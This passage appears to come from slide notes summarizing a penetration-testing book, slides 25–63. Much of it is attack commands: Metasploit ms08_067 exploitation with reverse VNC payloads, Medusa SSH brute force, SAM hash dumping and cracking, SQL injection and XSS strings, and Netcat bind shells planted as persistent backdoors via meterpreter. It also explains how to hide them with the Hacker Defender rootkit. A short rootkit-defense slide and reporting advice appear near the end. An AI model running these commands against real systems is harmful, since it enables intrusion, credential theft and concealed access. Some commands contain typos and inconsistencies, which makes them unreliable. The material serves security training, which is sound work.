  • 25. FPing : Ping Sweep tool • Ping is ICMP packet • is Echo Request packet • Ping Sweep is function which automatically sends ping to range of IP address. • # fping –a –g 192.16.45.1 192.16.45.254>hosts.txt : -a (save only result data) –g (sweep range)
  • 26. Nmap : Port scanning tool • Download (http://www.insecure.org) • TCP Scanning - #nmap –sT –p- –PN 172.16.45.135 • : -sT (TCP scanning), -P (all port scan. Not only popular 1000), • : -PN(skip running check, just try to port scan in and out of running) • SYN Scanning is called by Stealth Scan(Not anymore. It’s old story). • It’s default setting of Nmap scanning and more fast than TCP Scanning. • #nmap –sS –p –PN 172.16.45.135 • UDP Scanning #nmap –sUV 172.16.45.129 • : -sUV(UDP Scanning+Version Scanning) • UDP scanning taks long time. So, don’t use ‘–p’ , ‘-PN’. Already alomost 20min. • Version Scanning : Even port is filtered, Sometimes Version scanning could open. That’s why we use -sUV TCP 3way hand-shaking 1. SYN C to S 2. SYN, ACK S to C 3. ACK C to S
  • 27. Nmap : Port scanning tool • X-mas Tree Scanning #nmap –sX –p- –PN 172.16.45.129 • FIN, PSH, URG flags ‘ON’. If port is closed, target sends back ‘RST packet’ • If port is open, target doesn’t send anything. • Null Scanning #nmap –sN –p- -PN 172.16.45.129 • No flags. If closed, send back RST / if opened, send back nothing. • These two techniques are started from RFC documents. • Sometimes Algorithm has vulnerability in itself. • More options -T [0~5] : Scanning speed control for avoiding detection • -O : OS check
  • 28. Nessus : Vulnerability scanning • There are others ; Core Impact, Saint / premium • Steps • Download (http://www.nessus.org) • Type e-main in nessus website and check e-mail for product register key. • Install • Create account and access Nessus server. • Plug-In update • In Broswer, https://127.0.0.1:8834 and access Nessus. • Configuration Policies • Now, Scan vulnerability.
  • 30. Medusa : brute force tool • Installation # apt-get update • # apt-get install medusa (if you don’t have or if you want to update) • Password dictionary /pentest/passwords/wordlist : bult-in word list of Kali. • /pentest/passworrds/jtr/password.lst : Jack the ripper’s word list. • Could exploit AFP, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PC Anywhere, POP3, REXEC, RLOGIN, SMTPAUTH, SNMP, SSHv2, Telnet, VNC, Web etc. • #medusa –h 172.16.45.129 –u ownedb –P /pentest/passwords/wordlists/drkc0de.lst –M ssh • : -h [target_IP] • : -u [user_ID] (If target account is 1), -U [account_list] (if target account are many) • : -p [single password try], -P [password list location] • : –M [Authorization service type to exploit]
  • 31. Metasploit : essential tool (1/3) Introduction • Lots of people love it ! Thank you ‘HD Moore’ • It’s open source exploit ‘frameworks’ • Make you choose payloads you want. • Downloads (Http://www.metasploit.com) • Excute in Kali #/pentest/exploits/framwork3/msfconsole • or ‘K-start menu’ • Should see ‘msf> ‘ console screen • Update msf>msfupdate (do it everytime)
  • 32. Metasploit : essential tool (2/3) Attack practice • Use Nessus for finding Vulnerability. • (Need to use all you have for exploitation.) • If your taget didn’t update MS 08-67 or MS 09-001 • msf> search ms08-67 : can get information for where is attack code and it’s rank. • Rank system : Manual – Low – Average – Normal – Good – Great – Excelent • Higher Rank is likely to be succeed • msf> use windows/smb/ms08_067_netapi : chose attack code which Nessus recommended • msf> show payloads : can see lists which is compatiable with used code(above). • msf> set payload windows/vncinject/reverse_tcp
  • 33. Metasploit : essential tool (3/3) Attack practice • In this practice, we gonna install VNC(make them remote access to me) • msf> show options • msf> set RHOST 172.168.45.130 : target • msf> set LHOST 172.168.45.135 : attacker • msf> expoit : Now, it’s show time! Automatically it woks! • Summary 1. msf> msfupdate 2. “Nessus” 3. msf> search ms08_67 4. msf> use windows/smb/ms08_67 5. msf> show payloads 6. msf> set payload windows/vncinject/reverse_tcp 7. msf> show options 8. msf> set RHOST 172.168.45.130 9. msf> set LHOST 172.168.45.130 10. msf> exploit
  • 34. Metasploit : essential tool (4/4) Sample payload list • windows/adduser • windows/exec • windows/shell_bind_tcp • windows/shell_reverse_tcp • windows/meterpreter/bind_tcp • windows/meterpreter/reverse_tcp • windows/vncinject/bind_tcp • windows/vncinject/reverse_tcp Bind and Reverse bind : Attacker send attack code to target. Attacker access to target Reverse : Attacker send attack code to target Tagert access to Attacker
  • 35. Metasploit : essential tool (4/4) Metapreter • Excuted on shell, doesn’t use Hard disk drive. So, could make you conceal more. • Get authorization of a account which the metapreter was running at that time. • Designed as a Hacking tool from the beginning. • Command • migrate : move metapreter server to another process for avoiding power-off, service down etc • kill : process stop • download. upload, edit, excute • ls,ps,shutdown,mkdir,pwd,ifconfig etc (normally used in linux) • As advance function, get pwd hash using SAM juicer • Ruby shell, DLL load or excute, keyboard and mouse lock etc
  • 36. John the Ripper : the lord of pwd cracking • Password is important to get more authorization. • Hash coding performance test • # cd /pentest/passwords/jtr • # ./john –test • How to get SAM(Security Account Mager; windows) • 1. Metapreter and SAM juicer in case of remote computer • 2. Dual booting as kali when you can approach physically. • # fdisk –l • # mkdir /mnt/sda1 • # mount /dev/sda1 /mnt/sda1 : mount [From A] [To B], making connection route. • # cd /mnt/sda1/Windows/system32/config • # samdump2 system SAM > /tmp/hashes.txt : Decrypt SAM using system(key) and samdump2 Tip. So many times, Local Admin account password is same with Network Admin password. It’s really vulnerable point. Don’t do this and attack this! Download (http://www.openwall.com/john)
  • 37. John the Ripper : the lord of pwd cracking • Previous Microsoft encryption algorithm • LM (Lan Manager) • 1. make all alphabets capital letters • 2. length is 14, all the time • 3. saved 7 and 7. it’s easier than 14 length. • Recently use NTLM, but still some OS uses LM for compatibility with old computer. • # john : Automatically move john directory; /pentest/passwords/jtr • # ./john /tmp/hashes.txt : if target use LM • or # ./john /tmp/hases.txt -f:NT : if target use NTLM • In linux, password hash is at ‘/etc/shadow’ • # john or # cd /pentest/passwords/jtr • # ./unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes.txt : combined ‘passwd’ and ‘shadow’ like ‘system’ and ‘SAM’ in windows • # ./john /tmp/linux_hashes.txt : excute cracking • If there is any error massage like ‘No password hashes loaded’, it’s because of ‘John the ripper version’
  • 38. Password Resetting • By force, reset password. • Reset SAM files. So, it surely remains logs. • Need to approach physically. • Boot as Kali • # fdisk –l and # mount /dev/sda1 /mnt/sda1 • # cd /pentest/passwords/chntpw • # ./chntpw hn : find all available switches • # ./chntpw hi /mnt/sda1/WINDOWS/system32/config/SAM : ‘-i’ interactively • # ./chntpw –i /mnt/sda1/WINDOWS/system32/config/SAM
  • 39. Macof : Network Sniffing • Make it promicuous mode, not nonpromicuous mode. • Need to make a switch into a hub by ‘fail-open’ of switch. • : In case of ‘fail-closed’, it could be service down attack. • Macof imbue thousands of MAC address to switch. • repeat commands thousands times : #macof –i eth0 172.16.45.123 –d 172.16.45.2 • It’s easy to be detected. So, do this when you don’t need to care concealment.
  • 40. Wireshark : Network Sniffing • Download (http://wireshark.org) : old name is ‘Ethereal’ • Try to monitor FTP packet, FTP uses uncoded packet
  • 41. Fast Track Auto • Automate all exploitation steps. All you need to do is just to set target’s IP address. • It doesn’t care any concealment or caution. • How to use • ‘Penetration’ – ‘Fast Track’ - ‘Fast-Track WebGUI’ – ‘Autopwn Automation Link’ – type IP address • # sessions –l • # sessions –i [ID] • After commands, Now metapreter is excuting in target PC
  • 42. PRACTICE • Recommend Practice target • Windows XP • Metasploit Unleashed project_ setting Ubuntu 7.04(has SAMBA) • Metasploitable : download using torrent from metasploit express cummunity site • De-ICE : penetration test live Linux CD series • download (http://heorot.net/livecds/) • It couldn’t attack using only Fast-Track. So, it’s good to practice
  • 43. CHAPTER 5. Web based Exploitation Intetnet gonna be more execuatable. It means internet could be exposed to critical invasion.
  • 44. NIKTO : webserver vulnerability scanner • After Port-scanning and Discovering about port 80(http) 443(https), • NIKTO would be used for evaluating the service. • # cd /pentest/scanners/nikto • # perl nikto.pl : see available options • # perl nikto.pl –h 172.16.45.129 –p 1-1000 –o /tmp/nikto_saves.txt • : ‘-h’ target IP, ‘-p’ port scanning, ‘-o’ save route and choose file name • Download (http://www.cirt.net/Nikto2)
  • 45. Websecurity : Automated web vulnerability scanner • Good to figure out vulnerability point ; SQL injection, XSS, attached file etc. • ‘K-start’ – ‘Backtrack’ – ‘Web Application Analysis’ – Web(front end) - Websercurity
  • 46. WebScrab : Spidering Website information collecter • Usually After Vulnerability Scanning(:Nikto and Websecurity), execute Spidering Program(:WebScrab) • WebScrab is capable through OWSP website. • How to use • Same route with ‘Websecurity’, just - ‘Web(front end)’ – WebScrab lite • Setup Manual proxy configuration : < IP : 127.0.0.1 (loopback), Port : 8008 > • : All web traffics gonna pass WebScrab cause of Proxy setting • : https is no more available cause of WebScrab • : Can control network traffic ; stop, monitor, manipulate • Inset URL and right-click, ‘Spider tree’ • : Spdering process is good to find unintended or exposed secret information.
  • 47. WebScrab : Spidering (2/2) Website information collecter • You can do ‘Packet intercept’ • Execute ‘WebScrab lite’ and check box ‘Intercept requests’ and ‘Intercept responses’ in intercept tab. : in this process, Proxy setting is necessary. • Try to change ‘Value field’. • HTTP requests and responses are normally encoded by ‘Base64’. • : It’s not encryption. So, easy to decode using program or online-tools
  • 48. SQL Injection : Injection exploitation • Modern web application uses Interpreted programming language and Back-End database, dynamic contents interacting with Users. • Should understand lost of SQL grammar and Vendors(makers). • when you search “laptop” in shopping mall site, it works like below. • Normal : SELECT * FROM product WHERE category=‘laptop’; • If you want to do SQL Injection, type “laptop’ or 1=1--” instead of “laptop” • SELECT * FROM product WHERE category=‘laptop’ or ‘1=1-- : the rear -- is comment • If Account is uncertain, usually return FIRST user account and It’s DB administrator with high probability. • SELECT * FROM users WHERE uname=‘ ‘or 1=1–- and pwd=‘syngress’ : the rear -- is comment • If you knows Account name, can apply belew setence. • SELECT * FROM users WHERE uname=‘admin’ and pwd=‘ ‘ or 1=1--
  • 49. XSS (Cross Site Scripting) • Inserting scripts into Web application. Those scripts works like truth-worthy website parts. • XSS focuses on Client exploitation instead of Sever (server is usual target) • After inserting scripts, User PC consider all contents are reliable. It’s really powerful exploitation. • XSS could be applicatable in website, e-mail, messenger etc. • Usual Test way • Type <scripts>alert(“XSS Test”)</scripts> • : If website popup message ‘XSS Test’, that website is vulnerable. • There are two major XSS exploitation. (Study by youself) • 1. Reflected cross-site scripting : Attacker sends scripts to server. • Server sends back scripts to Users. • In this case, Payload would be excuted immediately. • 2. Stored cross-site scripting : Attacker sends scripts to server. • vulnerable Server saves scripts. • It could effect all users who try to access this server.
  • 50. PRACTICE • OWASP developed vulnerable platform to learn and practice web based exploitation. • “The WebGoat” project. • It’s practical and scenario based study environment. Consists of more 30 lessons. • JRE is necessary and it could be downloaded (http://owasp.org) • Setup in Virtual system. Default ID/PW is guest/guest. • Recommend that you read “readme”. • You could know web exploitation trends on OWASP “Top Ten” • Recommend that you sign in OWASP. You can join projects and study together. Tip. ‘Burps Suit’ , Best application testing tool which is recommended by exper hackers.
  • 51. CHAPTER 6. Backdoor and Rootkit Attackers remain Backdoor and Rootkit for holding authorization. It make them in anytime again and again.
  • 52. Netcat • It can be used for file transfer, port scan, messenger. • There are two modes : Client mode and Server mode • 1. Client mode can make network connection and service with other PCs. • # nc –l –p 2323 : ‘-l’ listener mode, ‘-p’ port to wait access. ‘-L’ keep port open after disconnection. • # nc 172.16.45.132 2323 : It’s other PC. With this command, you can chat • If you add Netcat to ‘HKEY_LOCAL_MACHINEsoftwaremicrosoftwindowscurrentversionrun’ in Windows system, Netcat program would be executed every-windows boot. • In case of Linux, it’s more difficult. You need to make Bash scripts. Find it on internet, if you want to study more.
  • 53. Netcat (2/3) • When Netcat is still running • # nc –l –p 7777 > calc.exe : Receiving input would save in calc.exe • # nc 172.16.45.129 777 < calc.exe : Sending file • Netcat doesn’t let you know it’s done or not. So, disconnect ‘CTRL+C’ after a few seconds. • After seding, type ‘ls’ to check it’s done clearly. • Sometimes it can be used for figure out which service is working (even Nmap and Nessus doesn’t do) • # nc 172.16.45.129 50001 : See the responses, ‘-u’ UDP packet transfer. • # nc –l –p 12345 –e /bin/sh • : ‘-e [program]’ execute program, It’s powerful to setting backdoor shell. • : If anyone access using port 12345, could get shell. • In windows : # nc –l –p 12345 c:WindowsSystem32cmd.exe
  • 54. Netcat (3/3) • Summary • 1. Get metapreter shell • 2. metapreter > upload nc.exe c:windowssystem32 ( In case of windows ) • 3. metapreter > nc –L –p 5777 –e cmd.exe
  • 55. CryptCAT : Netcat’s encrytion version • All Netcat’s traffics are plain texts. So, make that better. That’s CryptCat. • CryptCat uses ‘twofish encryption’ • First of all, you need to change basic key ‘metallica’ using ‘-k’ option. • If you don’t do this, anybody can decrypt. So, It’s necessary. • Server • # cryptcat –l –p 5757 • Client • # cryptcat 172.16.45.129 5757 : Same grammar with Netcat.
  • 56. NetBus • It’s really classic SW for backdoor and remote-control ; It was made in 1998. • Install Server part on Target and Install Client part on Attacker. • Server (target) • execute ‘patch.exe’. Then, ‘patch.exe’ process is on your CPU • and every-time when you boot windows, it would execute automatically. • But, it’s classic. It’s good to practice But, not good to use in real exploitation..
  • 57. RootKit • It’s really powerful. You can hide your file, process and program. Sometimes even anti-SW can’t find it. • Even rootkit can hook system call. When you press Ctrl+Alt+Del, rootkit would hide its process.
  • 58. Hacker Defender • Don’t make it trick you. It’s rootkit! • Remember : hxdef100.exe : execute Hacker Defender on target PC. • hxdef100.ini : make a list what you want to hide (programs, files, services) • bdcli100.exe : Client SW for accessing Hacker defender’s backdoor. • How to use • 1. upload hsdef100.zip and unzip. • 2. modify hxdef100.ini to hide where it is or what you do. • [Hidden Table] : file names which you want to hide. ‘hxdef*’ : hide all files, directories which start ‘hxdef’ from file manager and windows explorer. • [Hidden Processes] : block interaction. If you add ‘calc.exe’, users couldn’t find or use calc.exe anymore. • [Root processes] : allow full-interaction even hidden files or system files. • [Hidden services] : hide services • [Hidden RegKeys] : In almost every-case, when you install programs, Registry would be added. • So, you need to hide you Registry Keys • [Hidden RegValues] : seperately hide RegKeys. • [Startup Run] : when Hacker Defender starts, this list also would execute. • [Free Space] : add fake space volume from real rest space volume of Hard disk. Unit is ‘byte’. • [Hidden Ports] : TCPI, TCPO, UDP. I is in-port, O is out-port. You can use ‘,’ to arrange ports. Tip. 1. You can install Netcat and hide it using Hacker Defender. Try it 2. If you want to master Rootkit, study OS kernel more and more.
  • 59. How to Defend Rootkit • 1. Use Kernel-level(low level) Anti-Virus Software. • 2. Always update your Anti-Virus Software. • 3. Monitoring IN&OUT traffics and ports. • 4. Sometimes use Anti-Rootkit Software ex. Rootkit Revealer, Vice, Blacklight of F-Secure • 5. Check infected OS using Normal OS.
  • 60. PRACTICE • You must use Netcat once in practice! • Windows’s Netcat and Linux’s Netcat communication is available. • Try to use advanced functions of Netcat • : Proxy, Reverse shell, Port scan, Disk partition image making and copy. • Read ‘man’ page. • When you practice Rootkit, use Virtual Machine for your safety. You should be stand-alone. • Ncat : Current version of Netcat. It’s a part of Nmap. Added SSL&IPv6 function. • Socat : similar to Ncat. Good to read and write network-traffics. • If you want to study more about backdoor, Back-orifice(classic backdoor) and Sub 7 are nice references. • If you want to study more about Rootkit, study OS kernel. • Before Rootkit or Backdoor, You need to get high-authorization.
  • 61. CHAPTER 7. Penetration Test Report
  • 62. Report of Penetration Test • At lease, These three are necessary. • 1. Test result summary • : Write down easily as possible as you can. Even history scholar could understand. • 2. Detailed result report • : Write down detailedly. This report is for similar engineers. • : Explain which critical problem could happen. Don’t focus on your achievement. • : Even you couldn’t penetrate, should write this report. Attach the result of attempts. • 3. Evidence • : attach screenshots or anything you could make them caution. • : If you don’t want to expose your special skills, you don’t need to do that. • But, at lease you should let them know which is vulnerable. • : The most important thing is to keep the secret information. It’s basic and essential. • It’s not enough to emphasize again and again.
  • 63. Lastly, Before end. • Join IT security Conference once at any cost! • Join Communities : InfraGard, OWASP, Backtrack-Linux Forums etc • More study, Here books. I just writ it down shortly. • Aggressive Network Self-Defense. By Neil R. • A Guide to kernel Exploitation. By Enrico Perla. • Managed Code Rootkits. By Erez Metula. • Nessus Network Auditing. By Russ Rogers. • Ninja hacking. By Thomas Wilhelm and Jason Andress. • PenTester’s Open Source Tookit. By Jeremy Faircloth. • Professional Penetration Testing. By Thomas Wilhelm. • Seven Deadliest Attack Series. • Stealing the Network : The complete Series. By Johnny Long